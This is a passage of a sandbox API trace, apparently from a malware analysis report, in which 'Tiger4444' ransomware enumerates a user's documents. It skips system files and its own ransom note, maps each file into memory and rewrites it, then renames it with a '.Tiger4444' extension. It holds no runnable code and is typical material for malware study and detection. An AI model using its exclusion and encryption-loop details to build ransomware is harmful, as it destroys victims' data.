(lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="boot") returned -1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="ids.txt") returned -1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="NTUSER.DAT") returned -1 [0047.993] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="9ehLACIDaiZ9PxP8jeTb.odp" | out: lpString1="9ehLACIDaiZ9PxP8jeTb.odp") returned="9ehLACIDaiZ9PxP8jeTb.odp" [0047.993] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\9ehLACIDaiZ9PxP8jeTb.odp", dwFileAttributes=0x0) returned 1 [0047.993] lstrlenW (lpString="9ehLACIDaiZ9PxP8jeTb.odp") returned 24 [0047.993] lstrlenW (lpString="Tiger4444") returned 9 [0047.993] lstrcmpiW (lpString1="8jeTb.odp", lpString2="Tiger4444") returned -1 [0047.993] lstrlenW (lpString=".dll") returned 4 [0047.993] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0047.993] lstrlenW (lpString=".lnk") returned 4 [0047.993] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0047.993] lstrlenW (lpString=".ini") returned 4 [0047.994] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0047.994] lstrlenW (lpString=".sys") returned 4 [0047.994] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0047.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\9ehLACIDaiZ9PxP8jeTb.odp" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\9ehlacidaiz9pxp8jetb.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.994] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.994] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13944690364) returned 1 [0047.994] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=73191) returned 1 [0047.994] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0047.994] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0047.994] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x120f0, lpName=0x0) returned 0x2c8 [0047.994] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x120f0) returned 0xbe0000 [0047.996] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.996] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0047.996] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.996] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0047.996] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0047.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0047.997] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13944982325) returned 1 [0047.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0047.997] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0047.997] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.997] CloseHandle (hObject=0x2c8) returned 1 [0047.998] CloseHandle (hObject=0x260) returned 1 [0047.998] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\9ehLACIDaiZ9PxP8jeTb.odp.Tiger4444") returned 100 [0047.998] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\9ehLACIDaiZ9PxP8jeTb.odp" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\9ehlacidaiz9pxp8jetb.odp"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\9ehLACIDaiZ9PxP8jeTb.odp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\9ehlacidaiz9pxp8jetb.odp.tiger4444"), dwFlags=0x1) returned 1 [0047.999] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=73200 | out: Addend=0xc6f980) returned 23384880 [0047.999] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 5137 [0047.999] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65ce2330, ftCreationTime.dwHighDateTime=0x1d4c889, ftLastAccessTime.dwLowDateTime=0xb1c9ef90, ftLastAccessTime.dwHighDateTime=0x1d4d01c, ftLastWriteTime.dwLowDateTime=0xb1c9ef90, ftLastWriteTime.dwHighDateTime=0x1d4d01c, nFileSizeHigh=0x0, nFileSizeLow=0x17142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jJADNxp7L0AwE.rtf", cAlternateFileName="JJADNX~1.RTF")) returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="Tiger4444.exe") returned -1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2=".") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="..") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="windows") returned -1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="bootmgr") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="pagefile.sys") returned -1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="boot") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="ids.txt") returned 1 [0047.999] lstrcmpiW (lpString1="jJADNxp7L0AwE.rtf", lpString2="NTUSER.DAT") returned -1 [0047.999] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="jJADNxp7L0AwE.rtf" | out: lpString1="jJADNxp7L0AwE.rtf") returned="jJADNxp7L0AwE.rtf" [0047.999] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\jJADNxp7L0AwE.rtf", dwFileAttributes=0x0) returned 1 [0047.999] lstrlenW (lpString="jJADNxp7L0AwE.rtf") returned 17 [0047.999] lstrlenW (lpString="Tiger4444") returned 9 [0047.999] lstrcmpiW (lpString1="L0AwE.rtf", lpString2="Tiger4444") returned -1 [0047.999] lstrlenW (lpString=".dll") returned 4 [0047.999] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0047.999] lstrlenW (lpString=".lnk") returned 4 [0047.999] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0047.999] lstrlenW (lpString=".ini") returned 4 [0047.999] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0047.999] lstrlenW (lpString=".sys") returned 4 [0048.000] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0048.000] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\jJADNxp7L0AwE.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\jjadnxp7l0awe.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.000] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.000] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13945289095) returned 1 [0048.000] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=94530) returned 1 [0048.000] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0048.000] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0048.000] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17450, lpName=0x0) returned 0x2c8 [0048.000] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17450) returned 0xbe0000 [0048.002] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.002] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0048.002] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.002] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0048.002] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.002] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0048.002] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.002] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0048.002] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13945545431) returned 1 [0048.002] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0048.002] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0048.002] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.003] CloseHandle (hObject=0x2c8) returned 1 [0048.003] CloseHandle (hObject=0x260) returned 1 [0048.004] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\jJADNxp7L0AwE.rtf.Tiger4444") returned 93 [0048.004] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\jJADNxp7L0AwE.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\jjadnxp7l0awe.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\jJADNxp7L0AwE.rtf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\jjadnxp7l0awe.rtf.tiger4444"), dwFlags=0x1) returned 1 [0048.005] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=94544 | out: Addend=0xc6f980) returned 23458080 [0048.005] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 5139 [0048.005] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd48da0, ftCreationTime.dwHighDateTime=0x1d4d119, ftLastAccessTime.dwLowDateTime=0xdca42690, ftLastAccessTime.dwHighDateTime=0x1d4d193, ftLastWriteTime.dwLowDateTime=0xdca42690, ftLastWriteTime.dwHighDateTime=0x1d4d193, nFileSizeHigh=0x0, nFileSizeLow=0x159a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UhpMWGFi.pps", cAlternateFileName="")) returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="Tiger4444.exe") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2=".") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="..") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="windows") returned -1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="bootmgr") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="pagefile.sys") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="boot") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="ids.txt") returned 1 [0048.005] lstrcmpiW (lpString1="UhpMWGFi.pps", lpString2="NTUSER.DAT") returned 1 [0048.005] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="UhpMWGFi.pps" | out: lpString1="UhpMWGFi.pps") returned="UhpMWGFi.pps" [0048.005] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\UhpMWGFi.pps", dwFileAttributes=0x0) returned 1 [0048.005] lstrlenW (lpString="UhpMWGFi.pps") returned 12 [0048.005] lstrlenW (lpString="Tiger4444") returned 9 [0048.005] lstrcmpiW (lpString1="MWGFi.pps", lpString2="Tiger4444") returned -1 [0048.005] lstrlenW (lpString=".dll") returned 4 [0048.005] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0048.005] lstrlenW (lpString=".lnk") returned 4 [0048.005] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0048.005] lstrlenW (lpString=".ini") returned 4 [0048.005] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0048.005] lstrlenW (lpString=".sys") returned 4 [0048.005] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0048.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\UhpMWGFi.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\uhpmwgfi.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.006] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.006] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13945879744) returned 1 [0048.006] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=88480) returned 1 [0048.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0048.006] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0048.006] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15ca0, lpName=0x0) returned 0x2c8 [0048.006] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15ca0) returned 0xbe0000 [0048.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0048.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0048.008] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0048.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0048.008] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13946123223) returned 1 [0048.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0048.008] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0048.008] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.009] CloseHandle (hObject=0x2c8) returned 1 [0048.009] CloseHandle (hObject=0x260) returned 1 [0048.010] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\UhpMWGFi.pps.Tiger4444") returned 88 [0048.010] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\UhpMWGFi.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\uhpmwgfi.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\UhpMWGFi.pps.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\uhpmwgfi.pps.tiger4444"), dwFlags=0x1) returned 1 [0048.010] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=88480 | out: Addend=0xc6f980) returned 23552624 [0048.010] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 5141 [0048.010] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c0b0e0, ftCreationTime.dwHighDateTime=0x1d4d19c, ftLastAccessTime.dwLowDateTime=0x9f04eaa0, ftLastAccessTime.dwHighDateTime=0x1d4c93b, ftLastWriteTime.dwLowDateTime=0x9f04eaa0, ftLastWriteTime.dwHighDateTime=0x1d4c93b, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x _R5.pdf", cAlternateFileName="X_R5~1.PDF")) returned 1 [0048.010] lstrcmpiW (lpString1="x _R5.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.010] lstrcmpiW (lpString1="x _R5.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.010] lstrcmpiW (lpString1="x _R5.pdf", lpString2="Tiger4444.exe") returned 1 [0048.010] lstrcmpiW (lpString1="x _R5.pdf", lpString2=".") returned 1 [0048.010] lstrcmpiW (lpString1="x _R5.pdf", lpString2="..") returned 1 [0048.011] lstrcmpiW (lpString1="x _R5.pdf", lpString2="windows") returned 1 [0048.051] lstrcmpiW (lpString1="x _R5.pdf", lpString2="bootmgr") returned 1 [0048.051] lstrcmpiW (lpString1="x _R5.pdf", lpString2="pagefile.sys") returned 1 [0048.051] lstrcmpiW (lpString1="x _R5.pdf", lpString2="boot") returned 1 [0048.051] lstrcmpiW (lpString1="x _R5.pdf", lpString2="ids.txt") returned 1 [0048.051] lstrcmpiW (lpString1="x _R5.pdf", lpString2="NTUSER.DAT") returned 1 [0048.051] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="x _R5.pdf" | out: lpString1="x _R5.pdf") returned="x _R5.pdf" [0048.051] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\x _R5.pdf", dwFileAttributes=0x0) returned 1 [0048.052] lstrlenW (lpString="x _R5.pdf") returned 9 [0048.052] lstrlenW (lpString="Tiger4444") returned 9 [0048.052] lstrcmpiW (lpString1="x _R5.pdf", lpString2="Tiger4444") returned 1 [0048.052] lstrlenW (lpString=".dll") returned 4 [0048.052] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.052] lstrlenW (lpString=".lnk") returned 4 [0048.052] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0048.052] lstrlenW (lpString=".ini") returned 4 [0048.052] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0048.052] lstrlenW (lpString=".sys") returned 4 [0048.052] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0048.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\x _R5.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\x _r5.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0048.052] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0048.052] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13950517790) returned 1 [0048.052] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1105) returned 1 [0048.052] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0048.052] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0048.052] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x2c8 [0048.052] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0xbe0000 [0048.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0048.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0048.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0048.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0048.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0048.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0048.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0048.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0048.053] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13950625373) returned 1 [0048.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0048.053] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0048.053] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0048.053] CloseHandle (hObject=0x2c8) returned 1 [0048.053] CloseHandle (hObject=0x260) returned 1 [0048.054] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\x _R5.pdf.Tiger4444") returned 85 [0048.054] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\x _R5.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\x _r5.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\x _R5.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\x _r5.pdf.tiger4444"), dwFlags=0x1) returned 1 [0048.054] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1120 | out: Addend=0xc6f980) returned 23641104 [0048.054] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 5143 [0048.055] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb596c7a0, ftCreationTime.dwHighDateTime=0x1d4cc4e, ftLastAccessTime.dwLowDateTime=0x63a5680, ftLastAccessTime.dwHighDateTime=0x1d4c773, ftLastWriteTime.dwLowDateTime=0x63a5680, ftLastWriteTime.dwHighDateTime=0x1d4c773, nFileSizeHigh=0x0, nFileSizeLow=0x522f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y6ubXI-WBD.pptx", cAlternateFileName="Y6UBXI~1.PPT")) returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="Tiger4444.exe") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2=".") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="..") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="windows") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="bootmgr") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="pagefile.sys") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="boot") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="ids.txt") returned 1 [0048.055] lstrcmpiW (lpString1="y6ubXI-WBD.pptx", lpString2="NTUSER.DAT") returned 1 [0048.055] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="y6ubXI-WBD.pptx" | out: lpString1="y6ubXI-WBD.pptx") returned="y6ubXI-WBD.pptx" [0048.055] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\y6ubXI-WBD.pptx", dwFileAttributes=0x0) returned 1 [0048.055] lstrlenW (lpString="y6ubXI-WBD.pptx") returned 15 [0048.055] lstrlenW (lpString="Tiger4444") returned 9 [0048.055] lstrcmpiW 